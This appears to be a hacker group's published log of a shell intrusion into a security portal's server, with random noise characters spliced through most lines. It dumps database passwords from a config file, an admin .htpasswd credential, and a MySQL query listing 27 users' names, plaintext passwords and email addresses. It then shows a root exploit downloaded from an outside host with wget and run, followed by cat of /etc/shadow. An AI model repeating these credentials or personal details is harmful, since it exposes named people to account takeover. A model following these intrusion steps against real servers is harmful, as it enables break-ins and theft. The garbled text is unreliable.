drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .1 W2 O( O& `5 t3 C
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ... {* M5 A! B! F
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0071 A: l+ u' C1 {$ A/ @
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
$ s; U( P* {. C, q& J% @- Idrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
) h! f+ T: S( ?- z8 C* b2 y* Qdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
+ g& H- z' I) S! {drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
( ~6 q: k g/ T-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg6 J; }! |4 h8 o# `
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config. g) D6 R8 f& H- k" m: X; q
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron0 p, k& s* P7 g6 L8 e$ ?
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd2 _3 A, q! A, b. ~9 d
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php- }+ H0 \6 w, _2 T, S
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
( G) a, f$ F5 Adrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed% Y& ~7 l3 o( R3 _, R
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
& Q: R6 i$ y6 o- R- @-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess. \. _# V- @ V* f1 y/ A4 ^0 {! d- h
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
. K/ T% C1 e( d2 D" {. ?' R-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php- U5 i- u$ q$ ]1 b) X/ D, H3 o
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html, X4 x- x& k4 |2 L2 R
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php* a0 f* ], u7 W4 S; I' ]" s9 R; U
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php7 Q# S' @9 C; \$ D
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
0 _( m( B h/ {5 E* R4 w$ g7 rdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
( n9 B0 n) ]/ l" A bdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang& i" G8 m5 T0 Z
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib, U5 N) E7 K2 j4 \0 A v
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log2 r1 F' l: Y9 \; f
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member0 t f& w. A' H$ n
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
' ~& N4 k) t; ~0 pdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
7 V+ _" U' H) X( `0 [-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf* X" k4 |6 _6 j3 i
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
! H3 D3 x, v, J) K-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt u( Z7 o, N% V
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
6 P; l4 @# b+ L# [9 c' S9 |( ldrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources; x. m& r: A- Z! Z' Z* v
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
# W# l8 I- Q+ r' Wdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes& S o1 S9 Z- i2 X' t. i
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
" }+ q* |/ I2 H1 \- rdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
5 ]( g p! N8 V3 @+ O' \0 N4 Y! }drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
5 C6 P/ b- S# [3 adrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old C" Z+ n9 R- U( k2 j; x
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php- M. n8 P- w2 [3 O3 o/ c1 i
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
+ q* T: k5 |2 `3 S; d: B
5 Q" [# X+ M5 r( J+ ~) psh-3.2$ head -20 index.php; `8 ?/ |* F; s I% A1 {" c
<?PHP1 i7 Y% d+ A$ W6 l' U) s) s8 \+ f
/**
# ^& m2 ^) d( d+ j. a4 K' _2 G* Mainfile (external) for astalavistaNET v2.0
( Q$ D' r! K- u6 i8 W8 w*3 W4 D; d# p) |( C8 |- k" l
* @copyright Astalavista IT Engineering GmbH2 e% f. j1 y/ [- d& X
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>9 L! v. w" ~* ?
* @version 1.0
; L. @& T* ^7 ?8 T ?& ~8 l$ L*/
: u7 T5 h% `8 \, ]' T+ n5 ]9 }. x2 n e: _& ]# E
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
# s) L/ P2 F9 q1 X5 r' X $dontStartSession = false;
6 [% |( W( }) S, K0 }4 L7 f } else {
. Y) Y8 S' t, {/ ?: l8 n' a" ] $dontStartSession = true;
" c9 v+ e. B& J& H8 _: b }5 w2 b \$ {& @3 ]
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);, F6 @5 Y# F0 ?6 {) v |
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
\+ d' C2 A0 f" V r require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
H# C, g7 q E6 p; e require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
5 l5 ?6 s; B. a' j k
* N1 A9 {2 H# w- Q/ t" esh-3.2$ cd config* c7 O# b i* W+ X" Y! m
sh-3.2$ ls -la% H/ c: p2 a# k" N% H. G7 G; y
total 32 G5 o. ]7 a2 O2 Q! Z8 \' w
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .) Y3 a: p% \( @& h
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
5 T& @; |+ B! [6 b; M, a! i-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
! W0 r8 h/ N; q5 J$ a! g4 B-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php, ?7 n* L. A5 {# H. B
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php/ ? `3 C7 \6 R2 z
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php, | ^2 L+ c1 `0 H1 \. X5 r q- S
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
8 h6 E/ }7 v$ \; J! @3 S8 X7 n5 \
sh-3.2$ cat com.conf.php. D: ?( N- G9 w6 n- k5 U+ H
[snip]+ |& k1 T' R, u
//member-database
7 q( C. A) z+ ?. E$ u4 s$_CONFIG['db_mem_server'] = ‘localhost’;3 }- e6 l5 }5 W
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;0 |( C4 @% w9 {7 a E- ?
$_CONFIG['db_mem_user'] = ‘astanet_db’;
* x) T5 o$ M. ^7 V( O( V6 Y. m$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
& p7 x* `2 v& h0 G6 ]$_CONFIG['db_mem_debug'] = false; //true or false
. M& j* j0 J* U4 a//ads-database5 R( H$ M0 ~% h
$_CONFIG['db_ads_server'] = ‘localhost’;% w* Z' R7 ]) f* i! w+ k
$_CONFIG['db_ads_database'] = ‘astanet_ads’;, j2 a' M0 G) z5 `
$_CONFIG['db_ads_user'] = ‘astanet_db’;+ {* F, T5 a0 M7 n" W/ c- V
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;1 b0 |5 D$ v; P3 V1 S4 W
$_CONFIG['db_ads_debug'] = false; //true or false
: X0 a/ r- t" m3 N* i9 N. m9 r//rainbow-database
6 B. W) y8 ~, x1 R5 j$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
/ b! g0 j4 M9 U* w- B- y$_CONFIG['db_rainbow_database'] = ‘rainbow’;
& X4 {: G& K6 j) M$_CONFIG['db_rainbow_user'] = ‘dinu’;
4 O: @' j# r: F+ ^/ d$_CONFIG['db_rainbow_password'] = ‘dinudinu’; D; C& B7 u$ Q% y$ N2 Q, u
$_CONFIG['db_rainbow_debug'] = false; //true or false* |: B! Y: E- Y( e3 U
//mailing lists database5 i' J/ s# T0 j# s$ |5 L5 H- F j
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;% d* k% j5 x; F& I1 O
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
( |7 S3 o% Q/ |& s2 L1 Q$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
) ]+ M0 T0 w/ `5 z; J0 l$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;3 T+ m/ V$ P! i. F5 ?
$_CONFIG['db_mailing_lists_debug'] = false; //true or false2 g) m. {0 W8 [- }" Z. c
//paypal/ ^' J, s5 L0 ^; m6 S' a
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
; c! d. `8 K0 y/ K$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
/ M" Y+ l# M( L9 H$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;6 X9 S2 A8 c3 c L
$_CONFIG['sub_pp_noship'] = ‘1′;+ T7 W- X* X$ d) p+ G
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
2 {- z; @" U1 ~- k% ?[snip]5 m& G# `" U# }# @" h2 ?
7 B0 N* X2 V$ D- y$ d0 S1 s2 ]
sh-3.2$ cd ..
: [2 h c v1 }% esh-3.2$ cd member- a. \, [7 y# r7 a
sh-3.2$ ls -la
0 I1 K0 e a. itotal 20$ E/ z9 C6 N1 g, Z" w0 u. t' e+ _
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .( ]3 h. j0 W; D) x* W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., i: ]7 r4 y; T
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
! ?7 D- w: T8 T/ O( S-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php8 ]: B. P" }" z* C2 s
sh-3.2$ cat .htaccess$ A9 b/ Y2 t T+ P3 _7 ~
SecFilterEngine off0 f- ]) C2 Y# ]& j1 _! c3 q8 u
1 E. t- \# ]0 \" W( A
sh-3.2$ cd ..0 Z# K# p( J) h6 |
sh-3.2$ cd cron
9 b. {2 g$ [" x- J1 b2 ^sh-3.2$ ls -la
4 t0 h x4 T$ ~total 168
7 I' ^5 J# A+ a% ?. G X5 k" a1 Q* Gdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
% h6 V- O; d$ J: o: ^* \$ Y; {1 kdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
' q0 X! |1 c D0 l8 E8 q! q-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php7 ~! d% d- Q1 N2 q- J" M
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php2 B3 E# c$ Q; \) e
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php& p6 ?& Y9 b$ }1 ]3 z5 B0 n
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
5 j; t% ?) w- n- u( H; `4 o+ ]3 A, J1 H-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php- s3 \1 y: V4 _, ~
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php2 A6 V! }. L& W/ W8 P+ U. M4 u
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
2 B# H) Q! W) h( |/ U% [4 p-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
: `( Q+ r1 n# u( @' N1 d-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
& @- H$ C% Z l# [- \. e-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php1 A. L$ V* n: J+ D1 g: s
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
9 S% t! q. k2 R' p2 } n5 N" N+ C( o-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php' n0 \( q3 C. s' y, M. x
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh$ \8 c) H+ A- E/ h3 \( J- {
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
7 J2 u4 L7 {# \7 j4 x2 h) W-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
7 z2 ^: _( t" q0 W1 Q+ l-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
7 \$ e/ z7 w6 y6 v5 x8 ]7 s) ~-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
; r2 N- h* b& z7 ?* t5 t g-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php9 |& K" f2 I; y. A& z
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
& l/ B( k) @) C3 w. W5 F* B' }2 W-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
- u+ k4 V4 R% F T; x" ]+ U-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php- l, O# d7 `6 Y
& W7 C3 \" E+ A& Ssh-3.2$ cd ../ C; ?, D8 A' S5 |8 w0 A1 o/ y
sh-3.2$ cd _007
/ V& ]9 v) P3 ~$ s. X/ rsh-3.2$ ls -la
3 ^4 ^' |! m3 I( Z/ H- @+ ^6 Vtotal 24
& Y* L, u/ A! | P9 Bdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
) P$ w( ]7 h0 Z: G3 B) `7 qdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% I) l3 l+ L5 ]; x
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
* {7 _8 O1 U: }& `' A* }8 S-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
2 M3 f7 i, X$ B. O3 q-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php& w2 x# D0 f. o! @( w% S5 r
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap: H% d6 }5 X8 d
" q" ]& q6 J" @sh-3.2$ cat .htaccess( c( u, N# v4 l5 g9 R' v' h
authType Basic
% M! B0 I* r# p3 L( [authName Admin
/ \* s1 P8 E! ?authUserFile /home/astanet/auth/.htadm_pwd( y* J0 y; R( O7 `" [7 d
require valid-user
1 [ g$ k8 }6 v: S; Q& D( f. ^5 _- h+ {3 h& M* U
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
6 G7 @5 f. O! x3 A' n) V0 kadmin2net:CR0bl65MwhfT
3 n% B2 z' d1 S6 v: L! ]0 v4 p C" E' {% R, D' S4 B, S$ R6 I
sh-3.2$ mysql -u astanet_db -p
- r) V- f# D/ N% LEnter password:2 k+ `! K4 \ k, V8 Y" f, k
Welcome to the MySQL monitor. Commands end with ; or \g.* `8 q ~& d0 u% Z8 ]" v9 S
Your MySQL connection id is 275153) U' l5 n5 L+ ~) ^' ~
Server version: 5.0.45-community-log MySQL Community Edition (GPL)$ z# q7 P* A; } d5 Q3 i8 i
5 s6 K- @1 }8 Z4 }7 g5 l- Z& xType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 N# K: v, v6 M# e
$ |+ n6 a- C% K# r8 O: mmysql> show databases;
" {' b5 ~' ]$ e' n+———————–+
, A0 C/ u! W O U* o" Z* E8 M| Database |
% n# g, o l) }3 m6 {9 B+———————–+
) }8 x1 l3 ]: j: l3 ]8 J| information_schema |/ u" U% a9 U2 ?$ N5 }/ W; `
| astanet_ads |
9 P; ?/ S. O; O/ n/ C8 i" C3 c( `| astanet_mailing_lists |
D- v1 K1 z# }9 B2 s6 }+ [| astanet_mediawiki |( ]( @7 F; [- E
| astanet_membersystem |
+ _5 G6 P2 {% k; @| test |- U" A; R6 V+ E7 Z2 ~- j h
+———————–+( S+ O& |1 n# x6 M, X+ m
6 rows in set (0.00 sec)
1 |0 K7 o6 R. }& B
# t" N8 p$ [$ m5 p4 X; Q$ a9 b/ Vmysql> use astanet_membersystem% r3 C2 p6 F6 V7 |8 F% i
Database changed
$ K& u& f) g1 k: ~; L& e' [5 A5 v, ~mysql> show tables;' x5 `# w, e9 M) r) [ g+ T6 d1 C
+———————————–+
F+ I: r. ?' A' J| Tables_in_astanet_membersystem |
; R, p. Y) v* f* w6 j) P+———————————–+
7 A" B! K- y7 ^/ G# T- s| blacklist_categories |
G$ p, Y( E8 {, ~5 p0 s5 y% G| blacklist_content |9 Y i( k( l( U i+ U$ y- i4 a
| blacklist_levels |
0 q5 l5 _- J4 A; F- T: h! Q| blacklist_mcset |' T' V# z6 A5 ^" q1 t5 L
| dir_categories |5 \9 p# u N+ L* ^0 ~1 ?
| dir_comments |
& i0 o) T" @2 h" g| dir_links |2 A6 `) t7 e% ]% U" A2 T% S& B, x
| dir_temp |
' k' l3 f: r# R. S* J8 W9 b; h$ v \| dir_votes |
) S. ?( R! H* G' V% b- v3 B| documents |+ {* J$ ?- I& @' N2 b6 ?
| documents_categories |
8 o2 s: r7 \9 }$ t, @: D3 m| email_content |' J! z! g: z% N4 o8 P' H
| email_settings |7 Q: i5 @# ~3 v; k+ s
| exploits |1 z0 D3 _) H4 k0 ?# u! T7 y' Q
| exploits_categories |5 N) z# N! G4 ], X
| exploittree_categories |
2 N5 b& r) k6 t6 ~( \| exploittree_exploits |, e5 Y, M' r1 Y3 i p- b. a( X# h5 ?
| home_values |
0 y' K1 D' q" D; N: M; R| iso_countries |2 ?5 F, r! h( |; ^+ T* D
| links_categories |3 S2 O3 x! I7 H
| links_records |
0 ?9 C4 w0 R! o8 \3 A: G* c6 U| links_unauth |
( Z: ?! T; X4 }. ^| links_votes |* T! N$ T; V+ s; s: {7 P9 Z
| log |
! {! s M! F, `" z| news_categories |
* A% {8 \; w# Q| news_comments |5 |# y4 Q- B, V: Q3 a1 o( N- @+ U
| news_emoticons |% I' _+ ~1 k" A. m! X
| news_latest |
$ }& V, \& ]; D( z/ |( ?& N| news_messages |
* T" c4 @0 N% @' v; c1 k| news_statistics |
! u6 u/ h, ^6 P2 [0 z| news_votes |# k# \" W/ o/ K3 v% ^+ E
| prices_content |
3 {8 X3 u5 W$ j( {8 d| prices_offers |( u) }9 I6 v& R2 t
| rss_settings |1 _& c+ G; g& }: ~
| sessions |
# z( p' b/ y9 D2 {" v' a2 q4 d| stats_signups |
9 V+ P$ ?. k* a+ G| u2u2 |
, U) b+ I; R+ a0 L) ^& j| u2u_contact |6 P- a) m% ^- l _+ L$ e7 b
| u2u_settings |
5 w* @5 o) ?0 r4 k| user_keywords_selected_categories |
. r% w$ v, _; w* t( S| users |
9 O$ q- [" B' Q9 N) ~2 G( r| users_ipn_test |4 Z: ~ I& @ _. s6 f, H8 M
| users_keyword_values | X. y! x4 @' E9 `4 I
| users_profile |. a: L" U! m+ L9 v Q$ s
| users_temp |
8 P4 l6 Q; x+ {; [. k| users_upgrade |9 F; ]$ F, j, `$ {; L
+———————————–+. I9 B- G5 M! r3 U" E0 o& \( e& [
46 rows in set (0.00 sec)
# G( j6 X9 V- N- |, w. U( ]! E
- L" O3 A' ^3 @7 l: @# wmysql> describe users;
; F- h: _5 ~% y4 c! v6 S! @! G+————————–+————————————–+——+—–+———————+—————-+
8 y! W; E! q4 P" [1 }: H| Field | Type | Null | Key | Default | Extra |
; g) U* v$ F6 p) {) m# E" V9 k9 x+————————–+————————————–+——+—–+———————+—————-+' W+ C" Z( }$ V q' ]& Q
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |) i; v: i4 P( g% p: ?
| user | varchar(50) | NO | | | |
9 w: o' C) b x! z" `| nickname | varchar(30) | NO | MUL | anonymous | |
+ `& q5 J$ p2 _4 J) h; o, y# {' e| password | varchar(30) | NO | | | |
1 M) Y5 g1 j7 L% y9 |/ C" ]| userlevel | tinyint(3) | YES | MUL | NULL | |
5 h, M' b$ b7 Y6 v* M$ l| exp | int(8) unsigned | NO | | 0 | |$ z; [) g" `2 l- `3 V) Y
| email | varchar(50) | NO | | | |: b* s1 w4 y2 r; H. ?2 W( ]) i
| ip | varchar(15) | NO | | 0 | |
6 S7 a7 W: G: n: @5 D1 s| proxy | set(’0′,’1′) | NO | | 0 | |' A9 y3 X2 O# [
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |" ` v1 w' N9 [' y0 e4 E+ P
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |* p7 l1 A z$ d* Q6 v3 ^ b5 |3 W
| anz_in | tinyint(1) | NO | | -1 | |( L9 x8 j- W! o. N1 [" k
| status | tinyint(1) unsigned | NO | | 0 | |
) Q; \ ~9 Z* l| checked | set(’0′,’1′,’2′) | NO | | 0 | |
1 |+ ^' N& e- ?* ]| freemember | set(’0′,’1′) | NO | | 0 | |
% E- x* Z% p& m* B- E| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | | {4 L* n6 f$ H% w2 G2 p
| lang | tinytext | NO | | | |
4 y$ |- f" O9 o% U& A% ~| adid | smallint(6) | NO | | 0 | |. q7 ^+ u/ F' m3 _! i) A
| pp_txn_id | varchar(255) | YES | | NULL | |& V) }0 P/ \$ m* u
| cnb_transaction_id | varchar(255) | YES | | NULL | |
5 G0 T$ V b( m! i3 d" f| cnb_order_id | varchar(255) | YES | | NULL | |
# L. X; H0 R4 S6 ?" O U- w| cnb_user_id | int(11) | YES | | 0 | |0 C/ r. N- S+ |
+————————–+————————————–+——+—–+———————+—————-+7 L5 h9 c! @. U: h) m! o8 S
22 rows in set (0.01 sec)
/ C, o! o, V! e4 ?8 T9 T
7 q( L+ R( Q& Z B! {mysql> select count(*) as skids from users;- }% G6 N- W2 d$ Q& S- B
+——-+
+ \5 n3 w: V3 e* B$ |5 f" L3 N| skids |
! \9 }/ y3 _- f0 l' e1 t4 W+——-+* Y( [8 B' E+ j3 u
| 25199 |
2 C- A5 e8 f1 p$ g$ h+——-+9 F& G$ o% K. Z" C4 _' T2 ]
1 row in set (0.00 sec). f- D& z: N7 v* @
* \, t! s% w$ }5 |
mysql> select user,nickname,password,email from users where userlevel = 1;9 a/ D( z/ ~3 o+ p% o8 @' o
+————————–+———————-+——————+———————————–+1 j% x0 P% y# f9 o
| user | nickname | password | email |1 \: e0 D! f5 `$ ~! D
+————————–+———————-+——————+———————————–+2 G8 R, b7 a) L% q6 d) n0 H
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |& _% r( a4 M* h o* t+ X
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |4 x$ ]7 N) F5 j; p- ?0 R
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
% W, A; M L( C* n7 E! a: s| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
. d% e0 g# f- f& X# ~3 }| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
' F, C3 [+ c1 w- X| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |) K! P9 e" \* v" F4 S
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |0 G* Y, ~5 Y* H6 y$ p4 Y0 F5 M4 h
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |0 T, i* ^8 Z2 a2 {
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
+ {8 m+ ~/ k/ g0 c. w1 J; x* Y6 ]! Q| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
, y9 Y" P# u5 d2 k% \| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
. T2 p/ {) N) W$ a. }# W| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |9 \/ Q/ Z# m% y! l7 k; [
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
; b3 j4 N) c7 x" F! y: W ?: ~, v4 ~| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
9 _" @: U/ s5 X| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |+ c" _6 Y* u) V0 h& T
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
8 v' ~* o! |# i3 {| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
$ [0 x- y; s/ m2 Z0 [' Z6 {| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
' Q1 W: _( Y- Y5 Q0 n5 Y9 g| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |5 N& }; j5 F' Y7 j/ V$ f5 A- e
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
9 r/ z( |5 @' g: J% O- S| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |0 z- e* {5 x- F. h& w
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |) ]7 G; x. E& u5 Z+ S
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
. i$ G# y7 H; ?2 b" m| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
4 B% J6 V O9 O4 X| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |( s$ F: l/ f9 M: u% T6 K
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
( Z1 w4 X3 G4 [. @( {2 K, r: r| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
8 ^( ~) E/ t2 w# v! Q3 f5 h, _+————————–+———————-+——————+———————————–+
$ c S1 K! O( \' L8 n8 G8 M27 rows in set (0.00 sec)
- E9 N1 j) D% A6 W+ O: ^
5 U/ r3 t; p: U# t+ x& D# {mysql> exit;5 i+ C) i8 J; F' K G
Bye
5 A4 {- u: ?" ^4 o& }' J) C. G8 ]" j. L- s4 d0 \6 b
[~] plaintext passwords? yes,4 ]. m) X4 u* b+ V( C
Those so called “security professionals” who charge you $6.66 / month to/ W) f" l) g$ ?2 K8 I8 O4 [
register at their hack-proof portal, save your passwords in plaintext…( C" K! Q* ]4 k( ?. T* A$ H
brilliant!0 x9 `6 f/ X' n0 L/ K+ Y/ k9 d& c8 O
+ Z- Z; e9 x `+ V$ O$ \1 X$ O* z7 l8 f[~] This been fun but we want more.: \% s: q2 F& b; ~" s. l
8 Z0 b! o5 d8 I S. Y1 @. Ash-3.2$ uname -a# V! X4 ~ t- l, x1 F% ~
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" V& d5 j7 w2 a c# nsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]$ S) U7 Q: m" @. \2 v
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
- s; r' f( C& i& P$ P% @Resolving anti.sec.labs… 13.33.33.37
2 k& m) r2 y' P) _) j7 y3 H% lConnecting to anti.sec.labs|13.33.33.37|:80… connected.: G/ Q3 y( h i' X, _ b
HTTP request sent, awaiting response… 200 OK" h0 E/ I( q( V. {$ W
Length: 18200 (18K) [text/plain]( P$ W% P* e" G: D5 B
Saving to: `g0troot’2 X- k1 H% M2 R7 m2 K+ o! D
; | r! L* [/ D4 w, H! l3 r' F
100%[=========================================================================================================================================>] 18,200 58.6K/s in
$ m7 g, n- _+ m$ l; G0.3s
: ]- ]5 | O. `) g' {
+ I% i/ P) d# T4 n/ ~/ P18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]$ ]. z6 a" R% u& d( L
7 f" L; n5 |0 ]3 O( o1 \sh-3.2$ ./g0troot -i x86_64$ {+ J: Z( K* Q" x8 z) d
[+] g0troot - anti.sec.labs- j& Z$ A, W! V q; W4 S9 v
[+] Target: 2.6.18-128.1.10.el5
) C" {9 A) S& p& P[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
/ |8 a% L/ E1 h0 ^1 F, I V8 V
% y+ l" w, l6 d6 m \) e6 ~0 J5 Z5 y[+] r00tr00t
+ e- y9 H; {) R* T) x& k[~] Executing shell…
1 Z) L$ {$ ^$ V# z0 ^: M- Y+ w5 Z) }6 {% E. B' s: t8 a! i- W
sh-3.2# id
$ {+ k! W$ M% [8 |uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)6 V( J8 a. l9 T2 ?' U: }
! ]3 N' {( N' V! A; Ish-3.2# cat /etc/shadow$ I. u0 [2 S& j' R& G( i1 _0 g
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
